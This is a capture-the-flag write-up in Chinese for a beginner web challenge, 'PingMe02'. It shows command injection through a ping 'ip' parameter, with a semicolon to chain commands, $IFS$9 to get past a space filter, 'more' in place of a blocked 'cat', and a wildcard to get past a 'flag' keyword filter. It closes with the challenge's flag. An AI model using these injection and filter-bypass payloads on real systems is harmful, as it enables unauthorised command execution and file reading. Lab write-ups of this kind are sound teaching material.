青少年CTF-qsnctf-Web-PingMe02

题目环境：

题目难度：★
题目描述：诶？又是一道Ping题目诶！

给了一个ip参数

传参：

?ip=1.1.1.1

有回显结果
使用英文分号";"进行连接后续命令

列出此路径下的目录和文件

?ip=1.1.1.1;ls

列出根目录下的所有目录和文件

?ip=1.1.1.1;ls /

不能有空格，空格被过滤

使用IFS绕过空格

IFS是Shell中的一个环境变量，它代表了Shell的内部字段分隔符。IFS的默认值是空格符、制表符和换行符，这些字符用于将输入行分割成字段，以便Shell可以对它们进行处理。在某些情况下，如果需要以空格为分隔符进行分割，可以使用IFS代替空格。

?ip=1.1.1.1;ls$IFS$9/

找到了flag文件

查看flag内容：

?ip=1.1.1.1;cat$IFS$9/flag

不能cat,cat关键字被过滤

使用命令more绕过过滤

?ip=1.1.1.1;more$IFS$9/flag

发现flag！flag关键字被过滤

使用特定符号绕过过滤

?ip=1.1.1.1;more$IFS$9/f*

"*"这个符号是查看f开头的所有文件，因为根目录下只有flag这一个以f开头的文件，故可以用此符号进行绕过

得到flag：
qsnctf{623024de-f68b-499e-a8a1-713864126b43}